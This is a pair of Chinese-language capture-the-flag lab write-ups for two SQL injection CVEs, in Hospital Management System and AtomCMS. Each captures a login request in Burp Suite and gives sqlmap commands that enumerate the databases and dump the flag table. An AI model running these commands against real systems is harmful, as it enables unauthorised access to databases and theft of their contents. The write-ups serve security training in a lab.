【春秋云境】CVE-2022-24263靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- Hospital Management System sqli
2.开启靶场
3.寻找注入点
-
根据提示该CMS存在sql注入,其注入点就在登录的位置
4.burpsuite抓包
- 开启BP抓包,随便填写用户名密码信息,点击Login。将请求包保存为1.txt
5.sqlmap攻击
-
爆库,发现存在ctf库,那咱们就可以直接梭哈
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch --dbs
-
爆表
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D ctf --tables
-
爆字段
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D ctf -T flag --dump
成功获得flag
【春秋云境】CVE-2022-24223靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- AtomCMS SQL注入漏洞
2.开启靶场
3.寻找后台
-
打开靶场直接跳到/home页面,但是页面没有任何有价值的信息,所以咱们尝试寻找后台。尝试/admin,果然跳转到了/admin/login.php的后台登陆页面
4.burpsuite抓包
-
开启BP抓包,随便填写用户名密码信息,点击submit。将请求包保存为1.txt
5.sqlmap攻击
-
爆库,发现存在一个atomcms库,我们继续对其进行爆表
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch --dbs
-
爆表
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D atomcms --tables
-
爆字段
python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D atomcms -T flag --dump